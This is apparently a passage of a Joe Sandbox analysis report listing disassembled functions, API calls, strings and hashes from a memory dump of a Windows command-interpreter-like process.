                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: LocalTime$ErrorLast_get_osfhandle
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: %s$/-.$:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1644023181-879152773
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 52adc4b69c0d6b0cc37f226843e3bc06c06473f0745bac629c27b33a4c267472
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 4082052c90eadb5fbea5b7e79809e47ae6d3768199751023202552351b13b01a
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 52adc4b69c0d6b0cc37f226843e3bc06c06473f0745bac629c27b33a4c267472
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FF918E66B0878295EB50AB24DC602BFE2A0FF84B94FC84536DA4E476D5EF3CE545C720
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706ED627C Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 95synchronizationCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          • WaitForSingleObject.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF706ED7251), ref: 00007FF706ED628E
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: ObjectSingleWait
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: wil
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 24740636-1589926490
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: ea3b1f99615cb6da41309659edc9fe07f1318ac417b21432a0effa90e1671882
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: d133d0715d76186c53083c6e29ed2670b80d2f15537452ecca73f74ff5bcb4a9
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ea3b1f99615cb6da41309659edc9fe07f1318ac417b21432a0effa90e1671882
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7D414F21A0874283F7206B15EC2427BA7A1FFC6785FE99131EA4947AD4DF3DE8498721
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EDCDC0 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 94windowCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: FormatMessage$ByteCharFreeLocalMultiWide_ultoa
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: $Application$System
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3377411628-1881496484
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 80d38d575318b3867918aa38a6e3db8ef172391286b4c5249a392e05da5dfb20
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: be0fce6b9ec2c6e440496e86333893bf0d4b8573b8d39d5896d5054923ccdbf4
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 80d38d575318b3867918aa38a6e3db8ef172391286b4c5249a392e05da5dfb20
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0F417C72B04B419AE710AB60EC203EEB7B5FB89748F945135DA4E43B98EF38D105C750
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EB14E8 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 64COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: AttributesDirectoryFileRemove$ErrorFullLastNamePath
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: :$\
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3961617410-1166558509
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 7382dc9ba5dd15d1d826e80cca2a433ebb6210e0cfd6d3e104106e7a41e883e1
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 19e234b5e15a76cc87d87d26b1c40dcbabb780ebb02299da316765917ecde753
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7382dc9ba5dd15d1d826e80cca2a433ebb6210e0cfd6d3e104106e7a41e883e1
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D7219222A0874286E7506B64BD740BBFAA1FF89BA5BC49231D91F43794DF3CD4458621
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EB7AA0 Relevance: 15.2, APIs: 10, Instructions: 221COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: CreateDirectoryDriveFullNamePathTypememset
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1397130798-0
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 8e7edb5b5352e80bd08ad7f08d899ebe22464f4bcaa288bcf446cfe77ebb0b3e
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 3f89045bacc17a47d6fb726bba0ef234afdc918ea2d9d3562a38c6ee1970964e
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8e7edb5b5352e80bd08ad7f08d899ebe22464f4bcaa288bcf446cfe77ebb0b3e
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C491B822B087868AEB65AB109C602BBF3A1FF88B94FD59135DA4E07794DF3CD5418720
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EC258C Relevance: 15.1, APIs: 5, Strings: 5, Instructions: 85COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC06C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF706EBB4DB), ref: 00007FF706EC06D6
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC06C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF706EBB4DB), ref: 00007FF706EC06F0
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC06C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF706EBB4DB), ref: 00007FF706EC074D
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC06C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF706EBB4DB), ref: 00007FF706EC0762
                                                                                                                                                                                                                                                                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 00007FF706EC25CA
                                                                                                                                                                                                                                                                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 00007FF706EC25E8
                                                                                                                                                                                                                                                                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 00007FF706EC260F
                                                                                                                                                                                                                                                                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 00007FF706EC2636
                                                                                                                                                                                                                                                                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 00007FF706EC2650
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: _wcsicmp$Heap$AllocProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: CMDEXTVERSION$DEFINED$ERRORLEVEL$EXIST$NOT
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3407644289-1668778490
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 73bc52d87adb43f98016766748090f79ae3978062519f174c0f235f90d2ce4d7
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 1d0d7f2e3052aba9080bab60d1d89b2c49bec927cfbf82c739118125041d07c8
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 73bc52d87adb43f98016766748090f79ae3978062519f174c0f235f90d2ce4d7
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DE312B25E18B028AF7157F21EC3527BA694BF84B94F949435DA0E462E5DF3CE502C731
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EE0C90 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 282COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: memset$callocfreememmovewcschr$AttributesErrorFileLastqsorttowupperwcsrchr
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: &()[]{}^=;!%'+,`~
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2516562204-381716982
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 46497fca5754c6479966f60d4708fe0825c75a770e24346d8a6fbe1751f9d7e4
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: d0a57ec851cc481dcdd7e4f7510696610ee39e019192a626666569938beedba6
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 46497fca5754c6479966f60d4708fe0825c75a770e24346d8a6fbe1751f9d7e4
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D3C19D36A04B5186EB50AB25AC602BEB7A0FF44B98F945135DE8D03B98DF3CE4A1C710
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EC7E80 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 210COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EBD3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF706EBD46E
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EBD3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF706EBD485
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EBD3F0: wcschr.MSVCRT ref: 00007FF706EBD4EE
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EBD3F0: iswspace.MSVCRT ref: 00007FF706EBD54D
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EBD3F0: wcschr.MSVCRT ref: 00007FF706EBD569
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EBD3F0: wcschr.MSVCRT ref: 00007FF706EBD58C
                                                                                                                                                                                                                                                                                                                                                                                                                                          • iswspace.MSVCRT ref: 00007FF706EC7EEE
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: wcschr$Heapiswspace$AllocProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: A
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3731854180-3554254475
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 41f65c48cf3e37159ed1ee97e5992bf17c61e45d372bd9afbfce449b4f210755
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 769b2eaf41feddaed95095f26bfc0bbafd3ab282426c82d06b7b62faf3b20525
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 41f65c48cf3e37159ed1ee97e5992bf17c61e45d372bd9afbfce449b4f210755
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 01A18D619097828AEB60BF11AC6027BF6A0FF55794FD88034DA9D47795EF3CE446CB20
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EDA39C Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 111libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: MemoryProcessRead$AddressLibraryLoadProc
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: NTDLL.DLL$NtQueryInformationProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1580871199-2613899276
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 248bfccf7fce2d74e04c554d0a409a3469e52293056c2e4adbebd786e6cf1904
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: c7fa98e7e90ab5c797e0921a17f2bd6ddc7abb066178f05ede1012cb9490a81b
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 248bfccf7fce2d74e04c554d0a409a3469e52293056c2e4adbebd786e6cf1904
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 70516271B18B8286EB50AF15EC1027AB7A5FF88B84F885135DA5E47B98DF3CE501C714
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EB7420 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 101fileCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: CloseCreateFileHandle_open_osfhandle_wcsicmp
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: con
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 689241570-4257191772
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: c7a2234d9573f6b473384a9ead2fa3a6435853c7d94b0c157743cf5a0c0f015b
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: a4c59ef32b3f8433ad7669e4d6778ebb460a066b332555246b3220d64f88a07a
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c7a2234d9573f6b473384a9ead2fa3a6435853c7d94b0c157743cf5a0c0f015b
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F641CF36A08B4587E610AF11AC5437AFAA0FF89BA5F948334DA2D437D0CF3DD8498750
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EDA58C Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 97memoryfileCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
